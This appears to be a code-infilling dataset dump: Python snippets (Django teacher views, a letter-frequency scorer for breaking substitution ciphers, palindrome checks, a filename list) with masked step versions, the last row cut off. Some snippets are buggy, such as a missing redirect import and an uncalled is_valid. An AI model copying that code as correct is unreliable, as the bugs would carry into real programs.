code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
from django.shortcuts import render
from .forms import TeacherForm,Teacher
from django.http import HttpResponse
def add_teacher(request):
if request.method=="POST":
form=TeacherForm(request.POST)
if form.is_valid():
form.save()
return redirect("list_teachers")
else:
return HttpResponse("invalid data",status=400)
else:
form=TeacherForm()
return render(request,"add_teacher.html",{"form":form})
def list_teachers(request):
teachers=Teacher.objects.all()
return render(request, "list_teachers.html",{"teachers":teachers})
def teacher_detail(request, pk):
teacher=Teacher.objects.get(pk=pk)
return render(request, "teacher_detail.html",{"teacher":teacher})
def edit_teacher(request, pk):
teacher=Teacher.objects.get(pk=pk)
if request.method== "POST":
form=TeacherForm(request.POST, instance=teacher)
if form.is_valid:
form.save()
return redirect("list_teachers")
else:
form=TeacherForm(instance=teacher)
return render(request, "edit_teacher.html",{"form":form})
# form = TeacherForm()
# return render(request,"add_teacher.html",{"form":form})
# Create your views here.
|
normal
|
{
"blob_id": "cf97c87400649dd15e5d006707f9adfbd0c91b2c",
"index": 4118,
"step-1": "<mask token>\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-2": "<mask token>\n\n\ndef list_teachers(request):\n teachers = Teacher.objects.all()\n return render(request, 'list_teachers.html', {'teachers': teachers})\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-3": "<mask token>\n\n\ndef add_teacher(request):\n if request.method == 'POST':\n form = TeacherForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('list_teachers')\n else:\n return HttpResponse('invalid data', status=400)\n else:\n form = TeacherForm()\n return render(request, 'add_teacher.html', {'form': form})\n\n\ndef list_teachers(request):\n teachers = Teacher.objects.all()\n return render(request, 'list_teachers.html', {'teachers': teachers})\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-4": "from django.shortcuts import render\nfrom .forms import TeacherForm, Teacher\nfrom django.http import HttpResponse\n\n\ndef add_teacher(request):\n if request.method == 'POST':\n form = TeacherForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('list_teachers')\n else:\n return HttpResponse('invalid data', status=400)\n else:\n form = TeacherForm()\n return render(request, 'add_teacher.html', {'form': form})\n\n\ndef list_teachers(request):\n teachers = Teacher.objects.all()\n return render(request, 'list_teachers.html', {'teachers': teachers})\n\n\ndef teacher_detail(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n return render(request, 'teacher_detail.html', {'teacher': teacher})\n\n\ndef edit_teacher(request, pk):\n teacher = Teacher.objects.get(pk=pk)\n if request.method == 'POST':\n form = TeacherForm(request.POST, instance=teacher)\n if form.is_valid:\n form.save()\n return redirect('list_teachers')\n else:\n form = TeacherForm(instance=teacher)\n return render(request, 'edit_teacher.html', {'form': form})\n",
"step-5": "from django.shortcuts import render\r\nfrom .forms import TeacherForm,Teacher\r\nfrom django.http import HttpResponse\r\n\r\n\r\ndef add_teacher(request):\r\n\tif request.method==\"POST\":\r\n\t\tform=TeacherForm(request.POST)\r\n\t\tif form.is_valid():\r\n\t\t\tform.save()\r\n\t\t\treturn redirect(\"list_teachers\")\r\n\t\telse:\r\n\t\t\treturn HttpResponse(\"invalid data\",status=400)\r\n\t\t\r\n\telse:\r\n\t\tform=TeacherForm()\r\n\r\n\treturn render(request,\"add_teacher.html\",{\"form\":form})\r\n\r\ndef list_teachers(request):\r\n\tteachers=Teacher.objects.all()\r\n\treturn render(request, \"list_teachers.html\",{\"teachers\":teachers})\r\n\r\ndef teacher_detail(request, pk):\r\n\r\n\tteacher=Teacher.objects.get(pk=pk)\r\n\r\n\treturn render(request, \"teacher_detail.html\",{\"teacher\":teacher})\r\n\r\ndef edit_teacher(request, pk):\r\n\t\r\n\tteacher=Teacher.objects.get(pk=pk)\r\n\r\n\tif request.method== \"POST\":\r\n\t\tform=TeacherForm(request.POST, instance=teacher)\r\n\r\n\t\tif form.is_valid:\r\n\t\t\tform.save()\r\n\t\t\treturn redirect(\"list_teachers\")\r\n\r\n\telse:\r\n\t\tform=TeacherForm(instance=teacher)\r\n\r\n\treturn render(request, \"edit_teacher.html\",{\"form\":form})\r\n\t# form = TeacherForm()\r\n\t# return render(request,\"add_teacher.html\",{\"form\":form})\r\n# Create your views here.\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#import getCanditatemap() from E_18_hacksub
import operator, pdb, collections, string
ETAOIN = """ etaoinsrhldcumgyfpwb.,vk0-'x)(1j2:q"/5!?z346879%[]*=+|_;\>$#^&@<~{}`""" #order taken from https://mdickens.me/typing/theory-of-letter-frequency.html, with space added at the start, 69 characters overall
length = 128
#ETAOIN ="ETAOINSHRDLCUMWFGYPBVKJXQZ"
def getCanditatemap():
return (dict.fromkeys((chr(i) for i in range (length)),0)) # https://stackoverflow.com/questions/2241891/how-to-initialize-a-dict-with-keys-from-a-list-and-empty-value-in-python/2241904
def getLettercount(mess):
charcount = getCanditatemap()
for char in mess:
if char in charcount:
charcount[char] +=1
return charcount
def getFreqOrder(mess):
#get a dictionary of each letter and its frequency count
lettertofreq = getLettercount(mess)
# second, make a dictionary of each frequency count to each letter(s) with that frequency
freqtochar = {}
for i in range(length):
i=chr(i)
if lettertofreq[i] not in freqtochar: # look for frequencies not present
freqtochar[lettertofreq[i]] = [i] # add if not present, else append
else:
freqtochar[lettertofreq[i]].append(i)
#reverse ETAOIN order, for each list of letters (per frequency)
for freq in freqtochar:
freqtochar[freq].sort(key=ETAOIN.find, reverse=True)
freqtochar[freq] = ''.join(freqtochar[freq]) # convert to string
# sort them in order of frequency
#freqpairs = sorted(freqtochar.items(), key=operator.itemgetter(0), reverse=True)
freqpairs = collections.OrderedDict(sorted(freqtochar.items(), reverse=True))
# extractst the values and joins them together
freqorder = []
#print freqtochar
values = freqpairs.values() # grabs the values only
for freqpair in values:
#print freqpair
#pdb.set_trace()
freqorder.append(freqpair)
return ''.join(freqorder)
def englishFreqMatch(message):
#print message
matchscore =0
freqOrder = getFreqOrder(message.lower()) # convert to lower case as we are just looking for frequency match score, so case of the letter should not matter
#print freqOrder
#pdb.set_trace()
for commletter in (ETAOIN[:16] or ETAOIN[-16:]):
if commletter in (freqOrder[:16] or freqOrder[-16:]):
matchscore +=1
return matchscore
|
normal
|
{
"blob_id": "63a9060e9933cc37b7039833be5f071cc7bf45bf",
"index": 7873,
"step-1": "<mask token>\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\n<mask token>\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-2": "<mask token>\n\n\ndef getCanditatemap():\n return dict.fromkeys((chr(i) for i in range(length)), 0)\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\n<mask token>\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-3": "<mask token>\nETAOIN = (\n ' etaoinsrhldcumgyfpwb.,vk0-\\'x)(1j2:q\"/5!?z346879%[]*=+|_;\\\\>$#^&@<~{}`')\nlength = 128\n\n\ndef getCanditatemap():\n return dict.fromkeys((chr(i) for i in range(length)), 0)\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\ndef getFreqOrder(mess):\n lettertofreq = getLettercount(mess)\n freqtochar = {}\n for i in range(length):\n i = chr(i)\n if lettertofreq[i] not in freqtochar:\n freqtochar[lettertofreq[i]] = [i]\n else:\n freqtochar[lettertofreq[i]].append(i)\n for freq in freqtochar:\n freqtochar[freq].sort(key=ETAOIN.find, reverse=True)\n freqtochar[freq] = ''.join(freqtochar[freq])\n freqpairs = collections.OrderedDict(sorted(freqtochar.items(), reverse=\n True))\n freqorder = []\n values = freqpairs.values()\n for freqpair in values:\n freqorder.append(freqpair)\n return ''.join(freqorder)\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-4": "import operator, pdb, collections, string\nETAOIN = (\n ' etaoinsrhldcumgyfpwb.,vk0-\\'x)(1j2:q\"/5!?z346879%[]*=+|_;\\\\>$#^&@<~{}`')\nlength = 128\n\n\ndef getCanditatemap():\n return dict.fromkeys((chr(i) for i in range(length)), 0)\n\n\ndef getLettercount(mess):\n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] += 1\n return charcount\n\n\ndef getFreqOrder(mess):\n lettertofreq = getLettercount(mess)\n freqtochar = {}\n for i in range(length):\n i = chr(i)\n if lettertofreq[i] not in freqtochar:\n freqtochar[lettertofreq[i]] = [i]\n else:\n freqtochar[lettertofreq[i]].append(i)\n for freq in freqtochar:\n freqtochar[freq].sort(key=ETAOIN.find, reverse=True)\n freqtochar[freq] = ''.join(freqtochar[freq])\n freqpairs = collections.OrderedDict(sorted(freqtochar.items(), reverse=\n True))\n freqorder = []\n values = freqpairs.values()\n for freqpair in values:\n freqorder.append(freqpair)\n return ''.join(freqorder)\n\n\ndef englishFreqMatch(message):\n matchscore = 0\n freqOrder = getFreqOrder(message.lower())\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore += 1\n return matchscore\n",
"step-5": "#import getCanditatemap() from E_18_hacksub\nimport operator, pdb, collections, string\n\nETAOIN = \"\"\" etaoinsrhldcumgyfpwb.,vk0-'x)(1j2:q\"/5!?z346879%[]*=+|_;\\>$#^&@<~{}`\"\"\" #order taken from https://mdickens.me/typing/theory-of-letter-frequency.html, with space added at the start, 69 characters overall\nlength = 128\n#ETAOIN =\"ETAOINSHRDLCUMWFGYPBVKJXQZ\"\n\ndef getCanditatemap():\n return (dict.fromkeys((chr(i) for i in range (length)),0)) # https://stackoverflow.com/questions/2241891/how-to-initialize-a-dict-with-keys-from-a-list-and-empty-value-in-python/2241904\n\ndef getLettercount(mess):\n \n charcount = getCanditatemap()\n for char in mess:\n if char in charcount:\n charcount[char] +=1\n \n return charcount\n\ndef getFreqOrder(mess):\n\n #get a dictionary of each letter and its frequency count\n lettertofreq = getLettercount(mess)\n\n # second, make a dictionary of each frequency count to each letter(s) with that frequency\n freqtochar = {}\n for i in range(length):\n i=chr(i)\n if lettertofreq[i] not in freqtochar: # look for frequencies not present\n freqtochar[lettertofreq[i]] = [i] # add if not present, else append\n else:\n freqtochar[lettertofreq[i]].append(i)\n\n #reverse ETAOIN order, for each list of letters (per frequency)\n for freq in freqtochar:\n freqtochar[freq].sort(key=ETAOIN.find, reverse=True)\n freqtochar[freq] = ''.join(freqtochar[freq]) # convert to string\n \n # sort them in order of frequency\n #freqpairs = sorted(freqtochar.items(), key=operator.itemgetter(0), reverse=True)\n freqpairs = collections.OrderedDict(sorted(freqtochar.items(), reverse=True))\n \n # extractst the values and joins them together\n freqorder = []\n #print freqtochar\n values = freqpairs.values() # grabs the values only\n for freqpair in values:\n #print freqpair\n #pdb.set_trace() \n freqorder.append(freqpair)\n\n return ''.join(freqorder)\n\ndef englishFreqMatch(message):\n \n #print message\n matchscore =0\n freqOrder = getFreqOrder(message.lower()) # convert to lower case as we are just looking for frequency match score, so case of the letter should not matter\n #print freqOrder\n #pdb.set_trace()\n\n for commletter in (ETAOIN[:16] or ETAOIN[-16:]):\n if commletter in (freqOrder[:16] or freqOrder[-16:]):\n matchscore +=1\n return matchscore\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
# @Time : 2019/6/2 8:42
# @Author : Xu Huipeng
# @Blog : https://brycexxx.github.io/
class Solution:
def isPalindrome(self, x: int) -> bool:
num_str = str(x)
i, j = 0, len(num_str) - 1
while i < j:
if num_str[i] == num_str[j]:
i += 1
j -= 1
continue
return False
return True
def isPalindrome1(self, x: int) -> bool:
if x < 0: return False
res = []
while x >= 1:
tmp = x // 10
res.append(x - tmp * 10)
x = tmp
i, j = 0, len(res) - 1
while i < j:
if res[i] == res[j]:
i += 1
j -= 1
continue
return False
return True
def isPalindrome2(self, x: int) -> bool:
if x < 0: return False
div = 1
while x // div >= 10: div *= 10
while x > 0:
left = x // div
right = x % 10
if left != right: return False
x = (x % div) // 10
div //= 100
return True
def isPalindrome3(self, x: int) -> bool:
if x < 0 or (x % 10 == 0 and x != 0): return False
revert_num = 0
while revert_num < x:
num = x % 10
revert_num = revert_num * 10 + num
x //= 10
return revert_num == x or revert_num // 10 == x
if __name__ == '__main__':
s = Solution()
print(s.isPalindrome3(121))
|
normal
|
{
"blob_id": "40f57ccb1e36d307b11e367a2fb2f6c97051c65b",
"index": 6759,
"step-1": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) ->bool:\n if x < 0:\n return False\n div = 1\n while x // div >= 10:\n div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right:\n return False\n x = x % div // 10\n div //= 100\n return True\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) ->bool:\n if x < 0:\n return False\n div = 1\n while x // div >= 10:\n div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right:\n return False\n x = x % div // 10\n div //= 100\n return True\n\n def isPalindrome3(self, x: int) ->bool:\n if x < 0 or x % 10 == 0 and x != 0:\n return False\n revert_num = 0\n while revert_num < x:\n num = x % 10\n revert_num = revert_num * 10 + num\n x //= 10\n return revert_num == x or revert_num // 10 == x\n\n\n<mask token>\n",
"step-4": "class Solution:\n\n def isPalindrome(self, x: int) ->bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) ->bool:\n if x < 0:\n return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) ->bool:\n if x < 0:\n return False\n div = 1\n while x // div >= 10:\n div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right:\n return False\n x = x % div // 10\n div //= 100\n return True\n\n def isPalindrome3(self, x: int) ->bool:\n if x < 0 or x % 10 == 0 and x != 0:\n return False\n revert_num = 0\n while revert_num < x:\n num = x % 10\n revert_num = revert_num * 10 + num\n x //= 10\n return revert_num == x or revert_num // 10 == x\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.isPalindrome3(121))\n",
"step-5": "# @Time : 2019/6/2 8:42\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nclass Solution:\n def isPalindrome(self, x: int) -> bool:\n num_str = str(x)\n i, j = 0, len(num_str) - 1\n while i < j:\n if num_str[i] == num_str[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome1(self, x: int) -> bool:\n if x < 0: return False\n res = []\n while x >= 1:\n tmp = x // 10\n res.append(x - tmp * 10)\n x = tmp\n i, j = 0, len(res) - 1\n while i < j:\n if res[i] == res[j]:\n i += 1\n j -= 1\n continue\n return False\n return True\n\n def isPalindrome2(self, x: int) -> bool:\n if x < 0: return False\n div = 1\n while x // div >= 10: div *= 10\n while x > 0:\n left = x // div\n right = x % 10\n if left != right: return False\n x = (x % div) // 10\n div //= 100\n return True\n\n def isPalindrome3(self, x: int) -> bool:\n if x < 0 or (x % 10 == 0 and x != 0): return False\n revert_num = 0\n while revert_num < x:\n num = x % 10\n revert_num = revert_num * 10 + num\n x //= 10\n return revert_num == x or revert_num // 10 == x\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.isPalindrome3(121))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
files = ['data0Tue_Dec_30_20_37_34_2014.txt',
'data0Tue_Dec_30_20_37_49_2014.txt',
'data0Tue_Dec_30_20_38_04_2014.txt',
'data0Tue_Dec_30_20_38_19_2014.txt',
'data0Tue_Dec_30_20_38_34_2014.txt',
'data0Tue_Dec_30_20_38_49_2014.txt',
'data0Tue_Dec_30_20_39_04_2014.txt',
'data0Tue_Dec_30_20_39_19_2014.txt',
'data0Tue_Dec_30_20_39_34_2014.txt',
'data0Tue_Dec_30_20_39_49_2014.txt',
'data0Tue_Dec_30_20_40_04_2014.txt',
'data0Tue_Dec_30_20_40_19_2014.txt',
'data0Tue_Dec_30_20_40_34_2014.txt',
'data0Tue_Dec_30_20_40_49_2014.txt',
'data0Tue_Dec_30_20_41_04_2014.txt',
'data0Tue_Dec_30_20_41_18_2014.txt',
'data0Tue_Dec_30_20_41_34_2014.txt',
'data0Tue_Dec_30_20_41_49_2014.txt',
'data0Tue_Dec_30_20_42_04_2014.txt',
'data0Tue_Dec_30_20_42_19_2014.txt',
'data0Tue_Dec_30_20_42_34_2014.txt',
'data0Tue_Dec_30_20_42_49_2014.txt',
'data0Tue_Dec_30_20_43_04_2014.txt',
'data0Tue_Dec_30_20_43_19_2014.txt',
'data0Tue_Dec_30_20_43_34_2014.txt',
'data0Tue_Dec_30_20_43_49_2014.txt',
'data0Tue_Dec_30_20_44_04_2014.txt',
'data0Tue_Dec_30_20_44_19_2014.txt',
'data0Tue_Dec_30_20_44_34_2014.txt',
'data0Tue_Dec_30_20_44_49_2014.txt',
'data0Tue_Dec_30_20_45_04_2014.txt',
'data0Tue_Dec_30_20_45_19_2014.txt',
'data0Tue_Dec_30_20_45_34_2014.txt',
'data0Tue_Dec_30_20_45_49_2014.txt',
'data0Tue_Dec_30_20_46_04_2014.txt',
'data0Tue_Dec_30_20_46_19_2014.txt',
'data0Tue_Dec_30_20_46_34_2014.txt',
'data0Tue_Dec_30_20_46_49_2014.txt',
'data0Tue_Dec_30_20_47_04_2014.txt',
'data0Tue_Dec_30_20_47_19_2014.txt',
'data0Tue_Dec_30_20_47_34_2014.txt',
'data0Tue_Dec_30_20_47_50_2014.txt',
'data0Tue_Dec_30_20_48_05_2014.txt',
'data0Tue_Dec_30_20_48_20_2014.txt',
'data0Tue_Dec_30_20_48_35_2014.txt',
'data0Tue_Dec_30_20_48_50_2014.txt',
'data0Tue_Dec_30_20_49_05_2014.txt',
'data0Tue_Dec_30_20_49_20_2014.txt',
'data0Tue_Dec_30_20_49_35_2014.txt',
'data0Tue_Dec_30_20_49_50_2014.txt',
'data1Tue_Dec_30_20_50_05_2014.txt',
'data1Tue_Dec_30_20_50_20_2014.txt',
'data1Tue_Dec_30_20_50_35_2014.txt',
'data1Tue_Dec_30_20_50_50_2014.txt',
'data1Tue_Dec_30_20_51_05_2014.txt',
'data1Tue_Dec_30_20_51_20_2014.txt',
'data1Tue_Dec_30_20_51_35_2014.txt',
'data1Tue_Dec_30_20_51_50_2014.txt',
'data1Tue_Dec_30_20_52_05_2014.txt',
'data1Tue_Dec_30_20_52_20_2014.txt',
'data1Tue_Dec_30_20_52_35_2014.txt',
'data1Tue_Dec_30_20_52_50_2014.txt',
'data1Tue_Dec_30_20_53_05_2014.txt',
'data1Tue_Dec_30_20_53_20_2014.txt',
'data1Tue_Dec_30_20_53_35_2014.txt',
'data1Tue_Dec_30_20_53_50_2014.txt',
'data1Tue_Dec_30_20_54_04_2014.txt',
'data1Tue_Dec_30_20_54_19_2014.txt',
'data1Tue_Dec_30_20_54_34_2014.txt',
'data1Tue_Dec_30_20_54_49_2014.txt',
'data1Tue_Dec_30_20_55_04_2014.txt',
'data1Tue_Dec_30_20_55_19_2014.txt',
'data1Tue_Dec_30_20_55_34_2014.txt',
'data1Tue_Dec_30_20_55_49_2014.txt',
'data1Tue_Dec_30_20_56_04_2014.txt',
'data1Tue_Dec_30_20_56_19_2014.txt',
'data1Tue_Dec_30_20_56_34_2014.txt',
'data1Tue_Dec_30_20_56_49_2014.txt',
'data1Tue_Dec_30_20_57_04_2014.txt',
'data1Tue_Dec_30_20_57_19_2014.txt',
'data1Tue_Dec_30_20_57_33_2014.txt',
'data1Tue_Dec_30_20_57_48_2014.txt',
'data1Tue_Dec_30_20_58_03_2014.txt',
'data1Tue_Dec_30_20_58_18_2014.txt',
'data1Tue_Dec_30_20_58_33_2014.txt',
'data1Tue_Dec_30_20_58_48_2014.txt',
'data1Tue_Dec_30_20_59_03_2014.txt',
'data1Tue_Dec_30_20_59_18_2014.txt',
'data1Tue_Dec_30_20_59_33_2014.txt',
'data1Tue_Dec_30_20_59_48_2014.txt',
'data1Tue_Dec_30_21_00_03_2014.txt',
'data1Tue_Dec_30_21_00_17_2014.txt',
'data1Tue_Dec_30_21_00_32_2014.txt',
'data1Tue_Dec_30_21_00_47_2014.txt',
'data1Tue_Dec_30_21_01_02_2014.txt',
'data1Tue_Dec_30_21_01_17_2014.txt',
'data1Tue_Dec_30_21_01_32_2014.txt',
'data1Tue_Dec_30_21_01_47_2014.txt',
'data1Tue_Dec_30_21_02_03_2014.txt',
'data1Tue_Dec_30_21_02_17_2014.txt',
'data2Tue_Dec_30_21_02_32_2014.txt',
'data2Tue_Dec_30_21_02_47_2014.txt',
'data2Tue_Dec_30_21_03_02_2014.txt',
'data2Tue_Dec_30_21_03_17_2014.txt',
'data2Tue_Dec_30_21_03_32_2014.txt',
'data2Tue_Dec_30_21_03_47_2014.txt',
'data2Tue_Dec_30_21_04_02_2014.txt',
'data2Tue_Dec_30_21_04_17_2014.txt',
'data2Tue_Dec_30_21_04_31_2014.txt',
'data2Tue_Dec_30_21_04_46_2014.txt',
'data2Tue_Dec_30_21_05_01_2014.txt',
'data2Tue_Dec_30_21_05_16_2014.txt',
'data2Tue_Dec_30_21_05_31_2014.txt',
'data2Tue_Dec_30_21_05_45_2014.txt',
'data2Tue_Dec_30_21_06_00_2014.txt',
'data2Tue_Dec_30_21_06_16_2014.txt',
'data2Tue_Dec_30_21_06_31_2014.txt',
'data2Tue_Dec_30_21_06_46_2014.txt',
'data2Tue_Dec_30_21_07_01_2014.txt',
'data2Tue_Dec_30_21_07_16_2014.txt',
'data2Tue_Dec_30_21_07_31_2014.txt',
'data2Tue_Dec_30_21_07_46_2014.txt',
'data2Tue_Dec_30_21_08_01_2014.txt',
'data2Tue_Dec_30_21_08_16_2014.txt',
'data2Tue_Dec_30_21_08_30_2014.txt',
'data2Tue_Dec_30_21_08_45_2014.txt',
'data2Tue_Dec_30_21_09_01_2014.txt',
'data2Tue_Dec_30_21_09_16_2014.txt',
'data2Tue_Dec_30_21_09_31_2014.txt',
'data2Tue_Dec_30_21_09_46_2014.txt',
'data2Tue_Dec_30_21_10_00_2014.txt',
'data2Tue_Dec_30_21_10_16_2014.txt',
'data2Tue_Dec_30_21_10_31_2014.txt',
'data2Tue_Dec_30_21_10_45_2014.txt',
'data2Tue_Dec_30_21_11_00_2014.txt',
'data2Tue_Dec_30_21_11_16_2014.txt',
'data2Tue_Dec_30_21_11_31_2014.txt',
'data2Tue_Dec_30_21_11_45_2014.txt',
'data2Tue_Dec_30_21_12_01_2014.txt',
'data2Tue_Dec_30_21_12_16_2014.txt',
'data2Tue_Dec_30_21_12_31_2014.txt',
'data2Tue_Dec_30_21_12_46_2014.txt',
'data2Tue_Dec_30_21_13_00_2014.txt',
'data2Tue_Dec_30_21_13_15_2014.txt',
'data2Tue_Dec_30_21_13_31_2014.txt',
'data2Tue_Dec_30_21_13_46_2014.txt',
'data2Tue_Dec_30_21_14_00_2014.txt',
'data2Tue_Dec_30_21_14_15_2014.txt',
'data2Tue_Dec_30_21_14_30_2014.txt',
'data2Tue_Dec_30_21_14_45_2014.txt',
'data3Tue_Dec_30_21_15_00_2014.txt',
'data3Tue_Dec_30_21_15_15_2014.txt',
'data3Tue_Dec_30_21_15_29_2014.txt',
'data3Tue_Dec_30_21_15_44_2014.txt',
'data3Tue_Dec_30_21_15_59_2014.txt',
'data3Tue_Dec_30_21_16_15_2014.txt',
'data3Tue_Dec_30_21_16_30_2014.txt',
'data3Tue_Dec_30_21_16_44_2014.txt',
'data3Tue_Dec_30_21_16_59_2014.txt',
'data3Tue_Dec_30_21_17_15_2014.txt',
'data3Tue_Dec_30_21_17_29_2014.txt',
'data3Tue_Dec_30_21_17_45_2014.txt',
'data3Tue_Dec_30_21_18_00_2014.txt',
'data3Tue_Dec_30_21_18_15_2014.txt',
'data3Tue_Dec_30_21_18_29_2014.txt',
'data3Tue_Dec_30_21_18_44_2014.txt',
'data3Tue_Dec_30_21_18_59_2014.txt',
'data3Tue_Dec_30_21_19_14_2014.txt',
'data3Tue_Dec_30_21_19_29_2014.txt',
'data3Tue_Dec_30_21_19_44_2014.txt',
'data3Tue_Dec_30_21_19_59_2014.txt',
'data3Tue_Dec_30_21_20_14_2014.txt',
'data3Tue_Dec_30_21_20_29_2014.txt',
'data3Tue_Dec_30_21_20_45_2014.txt',
'data3Tue_Dec_30_21_21_00_2014.txt',
'data3Tue_Dec_30_21_21_15_2014.txt',
'data3Tue_Dec_30_21_21_30_2014.txt',
'data3Tue_Dec_30_21_21_45_2014.txt',
'data3Tue_Dec_30_21_21_59_2014.txt',
'data3Tue_Dec_30_21_22_14_2014.txt',
'data3Tue_Dec_30_21_22_29_2014.txt',
'data3Tue_Dec_30_21_22_44_2014.txt',
'data3Tue_Dec_30_21_22_58_2014.txt',
'data3Tue_Dec_30_21_23_14_2014.txt',
'data3Tue_Dec_30_21_23_28_2014.txt',
'data3Tue_Dec_30_21_23_43_2014.txt',
'data3Tue_Dec_30_21_23_58_2014.txt',
'data3Tue_Dec_30_21_24_13_2014.txt',
'data3Tue_Dec_30_21_24_28_2014.txt',
'data3Tue_Dec_30_21_24_43_2014.txt',
'data3Tue_Dec_30_21_24_58_2014.txt',
'data3Tue_Dec_30_21_25_12_2014.txt',
'data3Tue_Dec_30_21_25_28_2014.txt',
'data3Tue_Dec_30_21_25_43_2014.txt',
'data3Tue_Dec_30_21_25_58_2014.txt',
'data3Tue_Dec_30_21_26_12_2014.txt',
'data3Tue_Dec_30_21_26_27_2014.txt',
'data3Tue_Dec_30_21_26_42_2014.txt',
'data3Tue_Dec_30_21_26_57_2014.txt',
'data3Tue_Dec_30_21_27_12_2014.txt',
'data0Tue_Dec_30_21_27_52_2014.txt',
'data0Tue_Dec_30_21_28_07_2014.txt',
'data0Tue_Dec_30_21_28_22_2014.txt',
'data0Tue_Dec_30_21_28_37_2014.txt',
'data0Tue_Dec_30_21_28_51_2014.txt',
'data0Tue_Dec_30_21_29_06_2014.txt',
